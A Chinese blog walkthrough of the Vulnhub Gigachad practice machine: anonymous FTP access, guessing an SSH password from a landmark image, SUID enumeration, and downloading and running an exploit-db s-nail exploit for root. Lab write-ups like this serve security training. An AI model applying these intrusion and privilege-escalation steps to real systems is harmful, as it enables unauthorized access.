Vulnhub-Gigachad靶机复现(二)

简介: Vulnhub-Gigachad靶机复现

9 换个思路,ftp匿名(Anonymous)走起,发现有个文件

d106a5a24906e65ef53bed35338b4c17_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


10 将文件下载回来,用记事本打开,发现 PK 头,文件类型为 rar

8251dcf899f7b99f2ddee6f142759250_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


11 改后缀为 rar 文件,打开发现是文本文件

b1294f7ddd8a2ce5c317d56a1aeb46b4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

得到 用户名为chad,看来密码就在那个图片中了,哎呀看到光明了,冲冲冲~


12 访问图片地址:/drippinchad.png

0254e6918de915e3b459f6f7696b3bce_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


13 根据图片提示密码就是该建筑名称,百度识图整一波,gogogo~

961ff6bfe57222db9fba779adceec7ec_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

14 得知该建筑为女儿塔,百度其英文名:

1559c27b0da57442205fb99899548ae7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


15 Maiden's Tower 尝试用此密码登录ssh发现失败,后来尝试了几种组合发现密码为 maidenstower,成功连接ssh:


ssh chad@192.168.154.178

570da268ad43dbdd5d856e5192f0d219_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


16 发现是个低权限账户(目测要提权),先来瞅瞅文件吧,拿到1/2flag。

669f04f62e3660dfffd781a050e3f678_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


17 拿到低权限的shell后经常做的几件事:


1、看系统发行版本 lsb_release -a
2、查看内核版本 uname -a
3、当前用户权限
4、列举suid文件(找到高权限执行的程序) find / -perm -u=s 2>/dev/null
5、查看已经安装的包、运行的服务,过期版本可能会存在漏洞


18 查看系统的发行版本,内核版本,并未发现漏洞,对不起打扰了。

19 尝试使用suid提权,查看设置了 suid的程序:


find / -perm -u=s -type f 2>/dev/null

cb62223a2d7bce1f4fe67067617a14af_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png.

20 发现s-nail,尝试利用该程序提权(为什么选择该程序?别问,爱过!)Exploit-db 找下漏洞EXP

19d2c56228dc6cbf68e954d23ff94384_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png.

21 将EXP拷贝到靶机中,并赋予执行权限

1 exploit-db 下载 EXP

8f7a450d182203d0586dbdca84e1614f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

下载 EXP 命令:


wget https://www.exploit-db.com/download/47172

修改脚本去掉无用回车符号


sed -i "s/\r//" 447172


赋予 EXP  可执行权限

091981286a8180218dc0c230c7264889_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


22 执行 EXP成功提权(这里可能会失败,多试几次就可)

388b985e6ab717d69ead4451a00c8704_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


23 在root桌面找到第二个flag

594b1245d14ed4dc71321cc1d3f6582f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

23 彩蛋--得知真实身份为 ERDAL KOMURCU

55afef6e8c889a349f0c52db18ce9839_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

结语:

本人菜弟弟一个,大佬勿喷,谢谢,如果觉得个人写的还凑活,三连(点赞+关注+转发)一哈吧💪谢谢各位师傅,祝各位师傅玩的开心😊。

相关文章
|
安全 搜索推荐 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
522 0
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
|
SQL 安全 搜索推荐
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
|
11月前
|
安全 Shell
vulnhub靶场—matrix-breakout-2-morpheus靶机
vulnhub靶场—matrix-breakout-2-morpheus靶机
148 2
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
327 0
|
安全 Shell Linux
vulnhub靶机系列之zico2
vulnhub靶机系列之zico2
|
网络安全 数据安全/隐私保护
Vulnhub-Gigachad靶机复现(一)
Vulnhub-Gigachad靶机复现
152 0
Vulnhub-Gigachad靶机复现(一)
|
Web App开发 存储 安全
Vulnhub靶场之Me-and-My-Girlfriend(一)
Vulnhub靶场之Me-and-My-Girlfriend
194 0
Vulnhub靶场之Me-and-My-Girlfriend(一)
|
Shell Apache 数据库
Vulnhub靶场之Me-and-My-Girlfriend(二)
Vulnhub靶场之Me-and-My-Girlfriend
127 0
Vulnhub靶场之Me-and-My-Girlfriend(二)
|
安全 Shell 网络安全
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-9
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-9
174 0
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-9
|
存储 缓存 安全
【VulnHub靶场】——HARRYPOTTER第三部: FAWKES
今天的博客内容是HARRYPOTTER: FAWKES教程(困难难度)
285 0
【VulnHub靶场】——HARRYPOTTER第三部: FAWKES